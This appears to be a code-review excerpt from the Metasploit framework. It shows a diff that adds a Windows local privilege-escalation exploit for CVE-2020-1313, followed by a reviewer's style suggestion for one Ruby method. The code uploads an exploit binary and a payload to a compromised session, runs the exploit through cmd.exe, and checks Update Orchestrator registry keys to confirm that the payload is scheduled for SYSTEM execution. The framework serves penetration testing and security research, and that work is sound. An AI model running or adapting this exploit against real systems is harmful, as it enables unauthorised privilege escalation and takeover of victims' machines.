modules/exploits/windows/local/cve_2020_1313_system_orchestrator.rb

```diff
@@ -0,0 +1,175 @@
+    validate_active_host
+    validate_target
+    fail_with(Failure::BadConfig, "#{temp_path} does not exist on the target") unless directory?(temp_path)
+
+    # Upload Exploit
+    vprint_status("Uploading exploit to #{sysinfo['Computer']} as #{exploit_path}")
+    ensure_clean_destination(exploit_path)
+    exploit_bin = exploit_data('cve-2020-1313', 'cve-2020-1313-exe.x64.exe')
+    write_file(exploit_path, exploit_bin)
+    print_status("Exploit uploaded on #{sysinfo['Computer']} to #{exploit_path}")
+
+    # Upload Payload
+    vprint_status("Uploading Payload to #{sysinfo['Computer']} as #{exploit_path}")
+    ensure_clean_destination(payload_path)
+    write_file(payload_path, payload_exe)
+    print_status("Payload (#{payload_exe.length} bytes) uploaded on #{sysinfo['Computer']} to #{payload_path}")
+    print_warning("This exploit requires manual cleanup of the payload #{payload_path}")
+
+    # Run Exploit
+    vprint_status('Running Exploit')
+    begin
+      output = cmd_exec('cmd.exe', "/c #{exploit_path} #{payload_path}", 60)
+      vprint_status("Exploit Output:\n#{output}")
+    rescue Rex::TimeoutError => e
+      elog('Caught timeout.  Exploit may be taking longer or it may have failed.', error: e)
+      print_error('Caught timeout.  Exploit may be taking longer or it may have failed.')
+    end
+    vprint_status("Cleaning up #{exploit_path}")
+    ensure_clean_destination(exploit_path)
+
+    # Check registry value
+    unless registry_key_exist?('HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Orchestrator\UScheduler')
+      fail_with(Module::Failure::Unknown, 'Failed to find registry scheduler data!')
+    end
+    reg_keys = registry_enumkeys('HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Orchestrator\UScheduler')
+    fail_with(Module::Failure::Unknown, 'Failed to find registry scheduler data!') if reg_keys.nil?
+    found_job = false
+    reg_keys.each do |key|
+      start_arg = registry_getvalinfo("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WindowsUpdate\\Orchestrator\\UScheduler\\#{key}", 'startArg')
+      next unless start_arg['Data'].include? payload_name
+
+      found_job = true
+      queued_time = registry_getvalinfo("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WindowsUpdate\\Orchestrator\\UScheduler\\#{key}", 'queuedTime')
+      q_time_i = queued_time['Data'].unpack1('L_')
+      q_time_t = (q_time_i / 10000000) - 11644473600
+      print_good("Payload Scheduled for execution at #{Time.at(q_time_t)}")
+    end
+    fail_with(Module::Failure::Unknown, 'Failed to find registry scheduler data!') unless found_job
+  end
+
+  def validate_active_host
+    begin
+      print_status("Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}")
+    rescue Rex::Post::Meterpreter::RequestError => e
+      elog('Could not connect to session', error: e)
+      raise Msf::Exploit::Failed, 'Could not connect to session'
+    end
+  end
```

Comment:
Since the entirety of the functionality of this method is wrapped in a `begin..rescue` block, it might be better-suited to use the rescue from method technique:

```suggestion
  def validate_active_host
    print_status("Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}")
  rescue Rex::Post::Meterpreter::RequestError => e
    elog('Could not connect to session', error: e)
    raise Msf::Exploit::Failed, 'Could not connect to session'
  end
```